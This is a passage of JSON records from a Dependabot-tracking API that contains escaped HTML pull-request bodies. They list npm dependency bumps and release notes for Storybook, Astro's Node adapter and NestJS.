changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCLI: Add skip onboarding, recommended/minimal config - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30930\"\u003e#30930\u003c/a\u003e, thanks \u003ca href=\"https://github.com/shilman\"\u003e\u003ccode\u003e@​shilman\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eCore: Fix using dates in expect statements - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/28413\"\u003e#28413\u003c/a\u003e, thanks \u003ca href=\"https://github.com/yann-combarnous\"\u003e\u003ccode\u003e@​yann-combarnous\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eReact Native Web: Fix expo router by setting JSX to automatic - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/31484\"\u003e#31484\u003c/a\u003e, thanks \u003ca href=\"https://github.com/dannyhw\"\u003e\u003ccode\u003e@​dannyhw\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eTest: Make sure that lit arrays are not cloned - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/31435\"\u003e#31435\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eControls: Fix boxShadow on empty controls - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/27193\"\u003e#27193\u003c/a\u003e, thanks \u003ca href=\"https://github.com/H0onnn\"\u003e\u003ccode\u003e@​H0onnn\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eReact Native Web: Update \u003ccode\u003ereact-native-web\u003c/code\u003e - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/31324\"\u003e#31324\u003c/a\u003e, thanks \u003ca href=\"https://github.com/ndelangen\"\u003e\u003ccode\u003e@​ndelangen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCLI: Only install Visual Test Addon if test feature is selected - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30966\"\u003e#30966\u003c/a\u003e, thanks \u003ca href=\"https://github.com/ghengeveld\"\u003e\u003ccode\u003e@​ghengeveld\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eCore: Fix telemetry error on Storybook UI - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30953\"\u003e#30953\u003c/a\u003e, thanks \u003ca href=\"https://github.com/yannbf\"\u003e\u003ccode\u003e@​yannbf\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eEmber: Fix \u003ccode\u003eember-template-compiler\u003c/code\u003e import for ember 6+ - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30682\"\u003e#30682\u003c/a\u003e, thanks \u003ca href=\"https://github.com/leoeuclids\"\u003e\u003ccode\u003e@​leoeuclids\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eNext: Update vite-plugin-storybook-nextjs to 2.0.0--canary.33.17a2310.0 - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30997\"\u003e#30997\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eSvelte: Exclude \u003ccode\u003enode_modules\u003c/code\u003e from docgen - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30981\"\u003e#30981\u003c/a\u003e, thanks \u003ca href=\"https://github.com/JReinhold\"\u003e\u003ccode\u003e@​JReinhold\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAngular: Fix zone.js support for Angular libraries - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30941\"\u003e#30941\u003c/a\u003e, thanks \u003ca href=\"https://github.com/valentinpalkovic\"\u003e\u003ccode\u003e@​valentinpalkovic\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAddon-docs: Fix non-string handling in Stories block - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30913\"\u003e#30913\u003c/a\u003e, thanks \u003ca href=\"https://github.com/JamesIves\"\u003e\u003ccode\u003e@​JamesIves\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eNextjs: Fix styled-jsx optimize vite warnings - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30932\"\u003e#30932\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eReact: Fix actImplementation is not a function - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30929\"\u003e#30929\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNext: Fix react aliases in next vite plugin - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30914\"\u003e#30914\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAngular: Export all files in Angular package.json - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30849\"\u003e#30849\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eCLI: Don't add packageManager entry to package.json automatically - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30855\"\u003e#30855\u003c/a\u003e, thank...\n\n_Description has been truncated_","html_url":"https://github.com/Dargon789/interface/pull/142","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dargon789%2Finterface/issues/142","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/142/packages"}},{"old_version":"5.2.2","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-27T19:51:37.000Z","version_change":"5.2.2 → 5.2.4","issue":{"uuid":"4535285153","node_id":"PR_kwDORYvafs7f-IIi","number":2,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 28 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-29T23:08:18.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-27T19:51:37.000Z","updated_at":"2026-05-29T23:08:20.000Z","time_to_close":184601,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":28,"packages":[{"name":"@astrojs/node","old_version":"9.5.4","new_version":"10.0.5","repository_url":"https://github.com/withastro/astro"},{"name":"@nestjs/core","old_version":"11.1.8","new_version":"11.1.18","repository_url":"https://github.com/nestjs/nest"},{"name":"@nestjs/microservices","old_version":"11.1.8","new_version":"11.1.19","repository_url":"https://github.com/nestjs/nest"},{"name":"astro","old_version":"5.17.3","new_version":"6.1.10","repository_url":"https://github.com/withastro/astro"},{"name":"axios","old_version":"1.13.5","new_version":"1.15.2","repository_url":"https://github.com/axios/axios"},{"name":"nodemailer","old_version":"7.0.11","new_version":"8.0.5","repository_url":"https://github.com/nodemailer/nodemailer"},{"name":"uuid","old_version":"11.1.0","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"yaml","old_version":"2.8.1","new_version":"2.8.3","repository_url":"https://github.com/eemeli/yaml"},{"name":"postcss","old_version":"8.4.38","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"vite","old_version":"7.1.12","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.27.1","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"basic-ftp","old_version":"5.0.5","new_version":"5.3.1","repository_url":"https://github.com/patrickjuchli/basic-ftp"},{"name":"brace-expansion","old_version":"1.1.12","new_version":"1.1.15","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"fast-uri","old_version":"3.1.0","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"flatted","old_version":"3.3.3","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"ip-address","old_version":"10.0.1","new_version":"10.2.0","repository_url":"https://github.com/beaugunderson/ip-address"},{"name":"node-forge","old_version":"1.3.2","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"protobufjs","old_version":"7.5.4","new_version":"7.6.1","repository_url":"https://github.com/protobufjs/protobuf.js"},{"name":"smol-toml","old_version":"1.6.0","new_version":"1.6.1","repository_url":"https://github.com/squirrelchat/smol-toml"},{"name":"socket.io-parser","old_version":"4.2.4","new_version":"4.2.6","repository_url":"https://github.com/socketio/socket.io"},{"name":"tmp","old_version":"0.2.5","new_version":"0.2.7","repository_url":"https://github.com/raszi/node-tmp"},{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@astrojs/node](https://github.com/withastro/astro/tree/HEAD/packages/integrations/node) | `9.5.4` | `10.0.5` |\n| [@nestjs/core](https://github.com/nestjs/nest/tree/HEAD/packages/core) | `11.1.8` | `11.1.18` |\n| [@nestjs/microservices](https://github.com/nestjs/nest/tree/HEAD/packages/microservices) | `11.1.8` | `11.1.19` |\n| [astro](https://github.com/withastro/astro/tree/HEAD/packages/astro) | `5.17.3` | `6.1.10` |\n| [axios](https://github.com/axios/axios) | `1.13.5` | `1.15.2` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `7.0.11` | `8.0.5` |\n| [uuid](https://github.com/uuidjs/uuid) | `11.1.0` | `14.0.0` |\n| [yaml](https://github.com/eemeli/yaml) | `2.8.1` | `2.8.3` |\n| [postcss](https://github.com/postcss/postcss) | `8.4.38` | `8.5.10` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.1.12` | `7.3.2` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.27.1` | `7.29.7` |\n| [basic-ftp](https://github.com/patrickjuchli/basic-ftp) | `5.0.5` | `5.3.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.12` | `1.1.15` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.1.0` | `3.1.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.3` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [ip-address](https://github.com/beaugunderson/ip-address) | `10.0.1` | `10.2.0` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.2` | `1.4.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [protobufjs](https://github.com/protobufjs/protobuf.js) | `7.5.4` | `7.6.1` |\n| [smol-toml](https://github.com/squirrelchat/smol-toml) | `1.6.0` | `1.6.1` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `4.2.4` | `4.2.6` |\n| [tmp](https://github.com/raszi/node-tmp) | `0.2.5` | `0.2.7` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n\n\nUpdates `@astrojs/node` from 9.5.4 to 10.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/releases\"\u003e@​astrojs/node's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​astrojs/node\u003c/code\u003e\u003ca href=\"https://github.com/10\"\u003e\u003ccode\u003e@​10\u003c/code\u003e\u003c/a\u003e.0.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16319\"\u003e#16319\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/940afd53040a14e924606b3218a8619c1e2674ee\"\u003e\u003ccode\u003e940afd5\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes static asset error responses incorrectly including immutable cache headers. Conditional request failures (e.g. \u003ccode\u003eIf-Match\u003c/code\u003e mismatch) now return the correct status code without far-future cache directives.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/blob/main/packages/integrations/node/CHANGELOG.md\"\u003e@​astrojs/node's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.0.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16319\"\u003e#16319\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/940afd53040a14e924606b3218a8619c1e2674ee\"\u003e\u003ccode\u003e940afd5\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes static asset error responses incorrectly including immutable cache headers. Conditional request failures (e.g. \u003ccode\u003eIf-Match\u003c/code\u003e mismatch) now return the correct status code without far-future cache directives.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16002\"\u003e#16002\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/846f27f4be8508f728d237e93fcac7c6ec8227b2\"\u003e\u003ccode\u003e846f27f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/buley\"\u003e\u003ccode\u003e@​buley\u003c/code\u003e\u003c/a\u003e! - Fixes file descriptor leaks from read streams that were not destroyed on client disconnect or read errors\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15941\"\u003e#15941\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/f41584ad8af1d9edfa22153fb65005b2e9529d73\"\u003e\u003ccode\u003ef41584a\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an infinite loop in \u003ccode\u003eresolveClientDir()\u003c/code\u003e when the server entry point is bundled with esbuild or similar tools. The function now throws a descriptive error instead of hanging indefinitely when the expected server directory segment is not found in the file path.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15735\"\u003e#15735\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/9685e2d5ef132ca113144c1714163511a93fd29e\"\u003e\u003ccode\u003e9685e2d\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/fa-sharp\"\u003e\u003ccode\u003e@​fa-sharp\u003c/code\u003e\u003c/a\u003e! - Fixes an EventEmitter memory leak when serving static pages from Node.js middleware.\u003c/p\u003e\n\u003cp\u003eWhen using the middleware handler, requests that were being passed on to Express / Fastify (e.g. static files / pre-rendered pages / etc.) weren't cleaning up socket listeners before calling \u003ccode\u003enext()\u003c/code\u003e, causing a memory leak warning. This fix makes sure to run the cleanup before calling \u003ccode\u003enext()\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15934\"\u003e#15934\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/6f8f0bc4e22e958ccc2164acb1aa8cce21c43148\"\u003e\u003ccode\u003e6f8f0bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Updates the Astro \u003ccode\u003epeerDependencies#astro\u003c/code\u003e to be \u003ccode\u003e6.0.0\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15868\"\u003e#15868\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/bb2b8f5cd3c9f3140b4bb0fb5a1d4c62b41883b8\"\u003e\u003ccode\u003ebb2b8f5\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where the adapter would cause a series of warnings during the build.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.0\u003c/h2\u003e\n\u003ch3\u003eMajor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15654\"\u003e#15654\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a32aee6eb8bb9ae46caf2249ff56df27db2d4e2a\"\u003e\u003ccode\u003ea32aee6\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/florian-lefebvre\"\u003e\u003ccode\u003e@​florian-lefebvre\u003c/code\u003e\u003c/a\u003e! - Removes the \u003ccode\u003eexperimentalErrorPageHost\u003c/code\u003e option\u003c/p\u003e\n\u003cp\u003eThis option allowed fetching a prerendered error page from a different host than the server is currently running on.\u003c/p\u003e\n\u003cp\u003eHowever, there can be security implications with prefetching from other hosts, and often more customization was required to do this safely. This has now been removed as a built-in option so that you can implement your own secure solution as needed and appropriate for your project via middleware.\u003c/p\u003e\n\u003ch4\u003eWhat should I do?\u003c/h4\u003e\n\u003cp\u003eIf you were previously using this feature, you must remove the option from your adapter configuration as it no longer exists:\u003c/p\u003e\n\u003cpre lang=\"diff\"\u003e\u003ccode\u003e// astro.config.mjs\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/eca29c17853b16fe2d05d1ecc7629b85bd30bfc2\"\u003e\u003ccode\u003eeca29c1\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16314\"\u003e#16314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/940afd53040a14e924606b3218a8619c1e2674ee\"\u003e\u003ccode\u003e940afd5\u003c/code\u003e\u003c/a\u003e Fix static asset error responses including immutable cache headers (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16319\"\u003e#16319\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/fab9c005403e4c807e469461556385bea1a44840\"\u003e\u003ccode\u003efab9c00\u003c/code\u003e\u003c/a\u003e chore: upgrade biome (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16246\"\u003e#16246\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/711f837cfa3374a458f1f91e08bc388e7c0e12e6\"\u003e\u003ccode\u003e711f837\u003c/code\u003e\u003c/a\u003e Prevent static assets from being caught by catch-all routes (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16047\"\u003e#16047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/88fcc98e58455167afa0233163680b833812b69d\"\u003e\u003ccode\u003e88fcc98\u003c/code\u003e\u003c/a\u003e fix integrations links across docs (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16098\"\u003e#16098\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/4a6ff2a40f5aaa844afc5ac2710b129e1d6ca7d5\"\u003e\u003ccode\u003e4a6ff2a\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16020\"\u003e#16020\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/b9e96da0fd6bef9230f9fe60887e99cdfb561dd7\"\u003e\u003ccode\u003eb9e96da\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency vitest to v4 (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/15372\"\u003e#15372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/846f27f4be8508f728d237e93fcac7c6ec8227b2\"\u003e\u003ccode\u003e846f27f\u003c/code\u003e\u003c/a\u003e fix: destroy read streams to prevent file descriptor leaks (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16002\"\u003e#16002\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/f41584ad8af1d9edfa22153fb65005b2e9529d73\"\u003e\u003ccode\u003ef41584a\u003c/code\u003e\u003c/a\u003e fix(node): recursion fs loop (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/15941\"\u003e#15941\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/878791fa7d5a8fb515e21e4ceec7693dbfe2e037\"\u003e\u003ccode\u003e878791f\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/15985\"\u003e#15985\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/withastro/astro/commits/@astrojs/node@10.0.5/packages/integrations/node\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@nestjs/core` from 11.1.8 to 11.1.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nestjs/nest/releases\"\u003e@​nestjs/core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.1.18 (2026-04-03)\u003c/h2\u003e\n\u003ch4\u003eBug fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16675\"\u003e#16675\u003c/a\u003e fix(microservices): preserve packet headers in nats serializer (\u003ca href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16683\"\u003e#16683\u003c/a\u003e fix(core): prevent injector hang when design:paramtypes is missing (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16637\"\u003e#16637\u003c/a\u003e fix(core): dependency injection edge case with moduleref.create (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16686\"\u003enestjs/nest#16686\u003c/a\u003e fix(core): sanitize sse message\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e, \u003ccode\u003eplatform-express\u003c/code\u003e, \u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16679\"\u003e#16679\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16623\"\u003e#16623\u003c/a\u003e fix(deps): update dependency fastify to v5.8.4 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-ws\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16618\"\u003e#16618\u003c/a\u003e chore(deps): bump ws from 8.19.0 to 8.20.0 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecommon\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16619\"\u003e#16619\u003c/a\u003e chore(deps): bump file-type from 21.3.3 to 21.3.4 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAnkit San (\u003ca href=\"https://github.com/ankitbelal\"\u003e\u003ccode\u003e@​ankitbelal\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eJakob Staudinger (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKrishna Chaitanya (\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMK (\u003ca 